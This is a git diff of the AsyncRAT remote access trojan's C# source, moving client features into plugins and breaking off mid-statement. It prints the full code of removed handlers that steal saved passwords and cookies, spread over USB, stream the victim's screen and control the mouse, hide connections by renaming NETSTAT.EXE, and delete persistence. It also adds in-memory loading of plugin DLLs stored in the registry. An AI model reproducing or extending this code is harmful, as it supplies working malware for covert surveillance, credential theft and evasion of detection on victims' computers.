diff --git a/AsyncRAT-C#/AsyncRAT-Sharp.sln b/AsyncRAT-C#/AsyncRAT-Sharp.sln
index 6a96f0f..ef361b0 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp.sln
+++ b/AsyncRAT-C#/AsyncRAT-Sharp.sln
@@ -7,6 +7,30 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Server", "Server\Server.csp
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Client", "Client\Client.csproj", "{C3C49F45-2589-4E04-9C50-71B6035C14AE}"
EndProject
+Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Plugins", "Plugins", "{0DE8DA5D-061D-4649-8A56-48729CF1F789}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Chat", "Plugin\Chat\Chat\Chat.csproj", "{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Extra", "Plugin\Extra\Extra\Extra.csproj", "{424B81BE-2FAC-419F-B4BC-00CCBE38491F}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileManager", "Plugin\FileManager\FileManager\FileManager.csproj", "{BEE88186-769A-452C-9DD9-D0E0815D92BF}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LimeLogger", "Plugin\LimeLogger\LimeLogger\LimeLogger.csproj", "{DAFE686A-461B-402B-BBD7-2A2F4C87C773}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Miscellaneous", "Plugin\Miscellaneous\Miscellaneous\Miscellaneous.csproj", "{37E20BAF-3577-4CD9-BB39-18675854E255}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Options", "Plugin\Options\Options\Options.csproj", "{6AA4E392-AAAF-4408-B550-85863DD4BAAF}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "Plugin\ProcessManager\ProcessManager\ProcessManager.csproj", "{D640C36B-2C66-449B-A145-EB98322A67C8}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Recovery", "Plugin\Recovery\Recovery\Recovery.csproj", "{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RemoteCamera", "Plugin\RemoteCamera\RemoteCamera\RemoteCamera.csproj", "{619B7612-DFEA-442A-A927-D997F99C497B}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RemoteDesktop", "Plugin\RemoteDesktop\RemoteDesktop\RemoteDesktop.csproj", "{9042B543-13D1-42B3-A5B6-5CC9AD55E150}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SendFile", "Plugin\SendFile\SendFile\SendFile.csproj", "{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}"
+EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
@@ -21,10 +45,67 @@ Global
{C3C49F45-2589-4E04-9C50-71B6035C14AE}.Debug|Any CPU.Build.0 = Debug|Any CPU
{C3C49F45-2589-4E04-9C50-71B6035C14AE}.Release|Any CPU.ActiveCfg = Release|Any CPU
{C3C49F45-2589-4E04-9C50-71B6035C14AE}.Release|Any CPU.Build.0 = Release|Any CPU
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.Build.0 = Release|Any CPU
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.Build.0 = Release|Any CPU
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.Build.0 = Release|Any CPU
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.Build.0 = Release|Any CPU
+ {37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.Build.0 = Release|Any CPU
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Release|Any CPU.Build.0 = Release|Any CPU
+ {D640C36B-2C66-449B-A145-EB98322A67C8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {D640C36B-2C66-449B-A145-EB98322A67C8}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {D640C36B-2C66-449B-A145-EB98322A67C8}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {D640C36B-2C66-449B-A145-EB98322A67C8}.Release|Any CPU.Build.0 = Release|Any CPU
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.Build.0 = Release|Any CPU
+ {619B7612-DFEA-442A-A927-D997F99C497B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {619B7612-DFEA-442A-A927-D997F99C497B}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {619B7612-DFEA-442A-A927-D997F99C497B}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {619B7612-DFEA-442A-A927-D997F99C497B}.Release|Any CPU.Build.0 = Release|Any CPU
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Release|Any CPU.Build.0 = Release|Any CPU
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
+ GlobalSection(NestedProjects) = preSolution
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {37E20BAF-3577-4CD9-BB39-18675854E255} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {D640C36B-2C66-449B-A145-EB98322A67C8} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {619B7612-DFEA-442A-A927-D997F99C497B} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
+ EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {B9F2462F-603A-41C4-9CFC-1FAC60B4731C}
EndGlobalSection
diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj
index 0afea06..0116154 100644
--- a/AsyncRAT-C#/Client/Client.csproj
+++ b/AsyncRAT-C#/Client/Client.csproj
@@ -41,7 +41,7 @@
4
- true
+ false
Auto
@@ -52,7 +52,7 @@
TRACE
prompt
4
- true
+ false
Auto
false
@@ -72,72 +72,13 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- Form
-
-
- FormChat.cs
-
+
@@ -148,14 +89,6 @@
-
-
-
-
-
-
-
-
@@ -167,10 +100,5 @@
false
-
-
- FormChat.cs
-
-
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs b/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs
deleted file mode 100644
index e917816..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs
+++ /dev/null
@@ -1,74 +0,0 @@
-using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Runtime.InteropServices;
-using System.Text;
-
-namespace Client.Handle_Packet
-{
- public static class HandleBlankScreen
- {
- [DllImport("user32.dll")]
- public static extern IntPtr CreateDesktop(string lpszDesktop, IntPtr lpszDevice, IntPtr pDevmode, int dwFlags, uint dwDesiredAccess, IntPtr lpsa);
-
- [DllImport("user32.dll")]
- private static extern bool SwitchDesktop(IntPtr hDesktop);
-
- [DllImport("user32.dll")]
- public static extern bool CloseDesktop(IntPtr handle);
-
- [DllImport("user32.dll")]
- public static extern bool SetThreadDesktop(IntPtr hDesktop);
-
- [DllImport("user32.dll")]
- public static extern IntPtr GetThreadDesktop(int dwThreadId);
-
- [DllImport("kernel32.dll")]
- public static extern int GetCurrentThreadId();
- enum DESKTOP_ACCESS : uint
- {
- DESKTOP_NONE = 0,
- DESKTOP_READOBJECTS = 0x0001,
- DESKTOP_CREATEWINDOW = 0x0002,
- DESKTOP_CREATEMENU = 0x0004,
- DESKTOP_HOOKCONTROL = 0x0008,
- DESKTOP_JOURNALRECORD = 0x0010,
- DESKTOP_JOURNALPLAYBACK = 0x0020,
- DESKTOP_ENUMERATE = 0x0040,
- DESKTOP_WRITEOBJECTS = 0x0080,
- DESKTOP_SWITCHDESKTOP = 0x0100,
-
- GENERIC_ALL = (DESKTOP_READOBJECTS | DESKTOP_CREATEWINDOW | DESKTOP_CREATEMENU |
- DESKTOP_HOOKCONTROL | DESKTOP_JOURNALRECORD | DESKTOP_JOURNALPLAYBACK |
- DESKTOP_ENUMERATE | DESKTOP_WRITEOBJECTS | DESKTOP_SWITCHDESKTOP),
- }
-
- // old desktop's handle, obtained by getting the current desktop assigned for this thread
- static readonly IntPtr hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
-
- // new desktop's handle, assigned automatically by CreateDesktop
- static IntPtr hNewDesktop = CreateDesktop("RandomDesktopName", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero);
-
- public static bool switcher = false; //the screen is not blanked be default so this should be false
- public static void RunBlankScreen()
- {
- try
- {
- //light switch logic CopyPasta by MrDevBot
- if (switcher == false) //The current screen is NOT blanked and needs to be
- {
- SwitchDesktop(hNewDesktop);
- switcher = true; //sets the switch to on for next click
- return; //returns to calling function
- }
- else //the screen is blanked and should be switched back to old
- {
- SwitchDesktop(hOldDesktop);
- switcher = false; //sets the switch to off for next click
- return; //returns to calling function
- }
- }
- catch { }
- }
- }
-}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs b/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
deleted file mode 100644
index 80cf490..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
+++ /dev/null
@@ -1,41 +0,0 @@
-using Client.MessagePack;
-using Client.Connection;
-using System;
-using System.Diagnostics;
-using System.Reflection;
-//
-// │ Author : NYAN CAT
-// │ Name : LimeUSB v0.3
-
-// Contact Me : https://github.com/NYAN-x-CAT
-// This program Is distributed for educational purposes only.
-//
-
-namespace Client.Handle_Packet
-{
- public class HandleLimeUSB
- {
- public HandleLimeUSB(MsgPack unpack_msgpack)
- {
- try
- {
- Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes());
- MethodInfo meth = loader.GetType("Plugin.Plugin").GetMethod("Initialize");
- object injObj = loader.CreateInstance(meth.Name);
- int count = (int)meth.Invoke(injObj, null);
- if (count > 0)
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "usb";
- msgpack.ForcePathObject("Count").AsString = count.ToString();
- ClientSocket.Send(msgpack.Encode2Bytes());
- }
- }
- catch (Exception ex)
- {
- Debug.WriteLine(ex.Message);
- Packet.Error(ex.Message);
- }
- }
- }
-}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleNetStat.cs b/AsyncRAT-C#/Client/Handle Packet/HandleNetStat.cs
deleted file mode 100644
index b4f4e1b..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/HandleNetStat.cs
+++ /dev/null
@@ -1,50 +0,0 @@
-using Client.Helper;
-using System;
-using System.Diagnostics;
-using System.IO;
-
-namespace Client.Handle_Packet
-{
- public static class HandleNetStat
- {
- static bool switcher = false;
- static readonly string OriginalFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "System32\\NETSTAT.EXE");
- static readonly string BackupFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "System32\\NETSTAT.Backup.txt");
-
- public static void RunNetStat()
- {
- //light switch logic CopyPasta by MrDevBot
- if (!Methods.IsAdmin()) return; //if we are not admin return
-
- if (switcher == false) //The current screen is NOT blanked and needs to be
- {
- try
- {
- File.Move(OriginalFile, BackupFile);
- }
- catch (Exception ex)//probably AntiTamper protection or Admin Privilages
- {
- Debug.WriteLine(ex.Message);
- Packet.Error(ex.Message);
- }
-
- switcher = true; //sets the switch to on for next click
- return; //returns to calling function
- }
- else //the screen is blanked and should be switched back to old
- {
- try
- {
- File.Move(BackupFile, OriginalFile);
- }
- catch (Exception ex)//probably AntiTamper protection or Admin Privilages
- {
- Debug.WriteLine(ex.Message);
- Packet.Error(ex.Message);
- }
- switcher = false; //sets the switch to off for next click
- return; //returns to calling function
- }
- }
- }
-}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs b/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
deleted file mode 100644
index ee48ac7..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
+++ /dev/null
@@ -1,113 +0,0 @@
-using System;
-using System.IO;
-using System.Drawing.Imaging;
-using System.Drawing;
-using System.Windows.Forms;
-using System.Runtime.InteropServices;
-using Client.MessagePack;
-using Client.Connection;
-using Client.StreamLibrary.UnsafeCodecs;
-using Client.Helper;
-using Client.StreamLibrary;
-
-namespace Client.Handle_Packet
-{
- public class HandleRemoteDesktop
- {
- public HandleRemoteDesktop(MsgPack unpack_msgpack)
- {
- try
- {
- switch (unpack_msgpack.ForcePathObject("Option").AsString)
- {
- case "capture":
- {
- CaptureAndSend(Convert.ToInt32(unpack_msgpack.ForcePathObject("Quality").AsInteger), Convert.ToInt32(unpack_msgpack.ForcePathObject("Screen").AsInteger));
- break;
- }
-
- case "mouseClick":
- {
- Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
- Cursor.Position = position;
- mouse_event((Int32)unpack_msgpack.ForcePathObject("Button").AsInteger, 0, 0, 0, 1);
- break;
- }
-
- case "mouseMove":
- {
- Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
- Cursor.Position = position;
- break;
- }
- }
- }
- catch { }
- }
- public void CaptureAndSend(int quality, int Scrn)
- {
- TempSocket tempSocket = new TempSocket();
- string hwid = Methods.HWID();
- Bitmap bmp = null;
- BitmapData bmpData = null;
- Rectangle rect;
- Size size;
- MsgPack msgpack;
- IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(quality);
- MemoryStream stream;
- while (tempSocket.IsConnected && ClientSocket.IsConnected)
- {
- try
- {
- bmp = GetScreen(Scrn);
- rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
- size = new Size(bmp.Width, bmp.Height);
- bmpData = bmp.LockBits(new Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadWrite, bmp.PixelFormat);
-
- using (stream = new MemoryStream())
- {
- unsafeCodec.CodeImage(bmpData.Scan0, new Rectangle(0, 0, bmpData.Width, bmpData.Height), new Size(bmpData.Width, bmpData.Height), bmpData.PixelFormat, stream);
-
- if (stream.Length > 0)
- {
- msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
- msgpack.ForcePathObject("ID").AsString = hwid;
- msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray());
- msgpack.ForcePathObject("Screens").AsInteger = Convert.ToInt32(Screen.AllScreens.Length);
- tempSocket.Send(msgpack.Encode2Bytes());
- }
- }
- bmp.UnlockBits(bmpData);
- bmp.Dispose();
- }
- catch { break; }
- }
- try
- {
- bmp?.UnlockBits(bmpData);
- bmp?.Dispose();
- tempSocket?.Dispose();
- }
- catch { }
- }
-
- private Bitmap GetScreen(int Scrn)
- {
- Rectangle rect = Screen.AllScreens[Scrn].Bounds;
- try
- {
- Bitmap bmpScreenshot = new Bitmap(rect.Width, rect.Height, PixelFormat.Format32bppArgb);
- using (Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot))
- {
- gfxScreenshot.CopyFromScreen(rect.Left, rect.Top, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
- return bmpScreenshot;
- }
- }
- catch { return new Bitmap(rect.Width, rect.Height); }
- }
-
- [DllImport("user32.dll")]
- static extern void mouse_event(int dwFlags, int dx, int dy, uint dwData, int dwExtraInfo);
- }
-}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleThumbnails.cs b/AsyncRAT-C#/Client/Handle Packet/HandleThumbnails.cs
deleted file mode 100644
index 52e6194..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/HandleThumbnails.cs
+++ /dev/null
@@ -1,40 +0,0 @@
-using Client.MessagePack;
-using Client.Connection;
-using System;
-using System.Collections.Generic;
-using System.Diagnostics;
-using System.Drawing;
-using System.Drawing.Imaging;
-using System.IO;
-using System.Linq;
-using System.Text;
-using System.Windows.Forms;
-using System.Threading;
-namespace Client.Handle_Packet
-{
- public class HandleThumbnails
- {
- public HandleThumbnails()
- {
- try
- {
- Thread.Sleep(new Random().Next(3000));
- Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
- using (Graphics g = Graphics.FromImage(bmp))
- using (MemoryStream memoryStream = new MemoryStream())
- {
- g.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
- Image thumb = bmp.GetThumbnailImage(256, 256, () => false, IntPtr.Zero);
- thumb.Save(memoryStream, ImageFormat.Jpeg);
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "thumbnails";
- msgpack.ForcePathObject("Image").SetAsBytes(memoryStream.ToArray());
- ClientSocket.Send(msgpack.Encode2Bytes());
- thumb.Dispose();
- }
- bmp.Dispose();
- }
- catch { }
- }
- }
-}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
deleted file mode 100644
index 13343c4..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
+++ /dev/null
@@ -1,59 +0,0 @@
-using Client.Helper;
-using Microsoft.Win32;
-using System;
-using System.Collections.Generic;
-using System.Diagnostics;
-using System.IO;
-using System.Linq;
-using System.Security.Principal;
-using System.Text;
-using System.Windows.Forms;
-
-namespace Client.Handle_Packet
-{
- public class HandleUninstall
- {
- public HandleUninstall()
- {
- if (Convert.ToBoolean(Settings.Install))
- {
- try
- {
- if (!Methods.IsAdmin())
- Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Settings.InstallFile);
- else
- {
- Process.Start(new ProcessStartInfo()
- {
- FileName = "schtasks",
- Arguments = "/delete /f /tn " + @"""'" + Settings.InstallFile + @"""'",
- CreateNoWindow = true,
- ErrorDialog = false,
- UseShellExecute = false,
- WindowStyle = ProcessWindowStyle.Hidden
- });
- }
- }
- catch { }
- }
- ProcessStartInfo Del = null;
- try
- {
- Del = new ProcessStartInfo()
- {
- FileName = "cmd.exe",
- Arguments = "choice /C Y /N /D Y /T 2 & Del \"" + Application.ExecutablePath + "\"",
- WindowStyle = ProcessWindowStyle.Hidden,
- CreateNoWindow = true,
- };
- }
- catch { }
- finally
- {
- Process.Start(Del);
- Methods.ClientExit();
- Environment.Exit(0);
- }
- }
- }
-}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlerChat.cs b/AsyncRAT-C#/Client/Handle Packet/HandlerChat.cs
deleted file mode 100644
index 1220a37..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/HandlerChat.cs
+++ /dev/null
@@ -1,47 +0,0 @@
-using Client.Helper;
-using Client.MessagePack;
-using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading;
-using System.Windows.Forms;
-
-namespace Client.Handle_Packet
-{
- public class HandlerChat
- {
-
- public void CreateChat()
- {
- new Thread(() =>
- {
- Packet.GetFormChat = new FormChat();
- Packet.GetFormChat.ShowDialog();
- }).Start();
- }
- public void WriteInput(MsgPack unpack_msgpack)
- {
- if (Packet.GetFormChat.InvokeRequired)
- {
- Packet.GetFormChat.Invoke((MethodInvoker)(() =>
- {
- Console.Beep();
- Packet.GetFormChat.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Input").AsString + Environment.NewLine);
- }));
- }
- }
-
- public void ExitChat()
- {
- if (Packet.GetFormChat.InvokeRequired)
- {
- Packet.GetFormChat.Invoke((MethodInvoker)(() =>
- {
- Packet.GetFormChat.Close();
- Packet.GetFormChat.Dispose();
- }));
- }
- }
- }
-}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs b/AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs
deleted file mode 100644
index 98304aa..0000000
--- a/AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs
+++ /dev/null
@@ -1,36 +0,0 @@
-using Client.MessagePack;
-using Client.Connection;
-using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Reflection;
-using System.Text;
-using System.Diagnostics;
-namespace Client.Handle_Packet
-{
- public class HandlerRecovery
- {
- public HandlerRecovery(MsgPack unpack_msgpack)
- {
- try
- {
- // DLL StealerLib => gitlab.com/thoxy/stealerlib
- Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes());
- MethodInfo meth = loader.GetType("Plugin.Plugin").GetMethod("RecoverCredential");
- MethodInfo meth2 = loader.GetType("Plugin.Plugin").GetMethod("RecoverCookies");
- object injObj = loader.CreateInstance(meth.Name);
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
- msgpack.ForcePathObject("Password").AsString = (string)meth.Invoke(injObj, null);
- msgpack.ForcePathObject("Cookies").AsString = (string)meth2.Invoke(injObj, null);
- ClientSocket.Send(msgpack.Encode2Bytes());
- }
- catch (Exception ex)
- {
- Debug.WriteLine(ex.Message);
- Packet.Error(ex.Message);
- }
- return;
- }
- }
-}
diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
index ccc1682..96c7d44 100644
--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -10,16 +10,13 @@ using System.Reflection;
using System.Text;
using System.Threading;
using System.Windows.Forms;
+using System.Collections.Generic;
+using Microsoft.VisualBasic;
namespace Client.Handle_Packet
{
public static class Packet
{
- public static CancellationTokenSource ctsDos;
- public static CancellationTokenSource ctsReportWindow;
- public static FormChat GetFormChat;
- public static string FileCopy = null;
-
public static void Read(object data)
{
try
@@ -28,230 +25,57 @@ namespace Client.Handle_Packet
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
- case "sendMessage":
- {
- MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
- break;
- }
-
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
- case "thumbnails":
+ case "plugin": // run plugin in memory
{
- new HandleThumbnails();
+ Assembly assembly = AppDomain.CurrentDomain.Load(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString))));
+ Type type = assembly.GetType("Plugin.Plugin");
+ dynamic instance = Activator.CreateInstance(type);
+ instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install, Settings.InstallFile);
break;
}
- case "sendFile":
+ case "savePlugin": // save plugin as MD5:Base64
{
- Received();
- new HandleSendTo().SendToDisk(unpack_msgpack);
+ SetRegistry.SetValue(unpack_msgpack.ForcePathObject("Hash").AsString, unpack_msgpack.ForcePathObject("Dll").AsString);
+ Debug.WriteLine("plguin saved");
break;
}
- case "sendMemory":
+ case "checkPlugin": // server sent all plugins hashes, we check which plugin we miss
{
- Received();
- new HandleSendTo().SendToMemory(unpack_msgpack);
- break;
- }
-
- case "recoveryPassword":
- {
- Received();
- new HandlerRecovery(unpack_msgpack);
- break;
- }
-
- case "defender":
- {
- new HandleWindowsDefender();
- break;
- }
-
- case "uac":
- {
- new HandleUAC();
- break;
- }
-
- case "close":
- {
- Methods.ClientExit();
- Environment.Exit(0);
- break;
- }
-
- case "restart":
- {
- Process.Start(Application.ExecutablePath);
- Methods.ClientExit();
- Environment.Exit(0);
- break;
- }
-
- case "uninstall":
- {
- new HandleUninstall();
- break;
- }
-
- case "usbSpread":
- {
- new HandleLimeUSB(unpack_msgpack);
- break;
- }
-
- case "remoteDesktop":
- {
- new HandleRemoteDesktop(unpack_msgpack);
- break;
- }
-
- case "processManager":
- {
- new HandleProcessManager(unpack_msgpack);
- }
- break;
-
- case "fileManager":
- {
- new FileManager(unpack_msgpack);
- }
- break;
-
- case "botKiller":
- {
- new HandleBotKiller().RunBotKiller();
- break;
- }
-
- case "keyLogger":
- {
- string isON = unpack_msgpack.ForcePathObject("isON").AsString;
- if (isON == "true")
+ List plugins = new List();
+ foreach (string plugin in unpack_msgpack.ForcePathObject("Hash").AsString.Split(','))
{
- new Thread(() =>
+ if (SetRegistry.GetValue(plugin.Trim()) == null)
{
- HandleLimeLogger.isON = true;
- HandleLimeLogger.Run();
- }).Start();
+ plugins.Add(plugin.Trim());
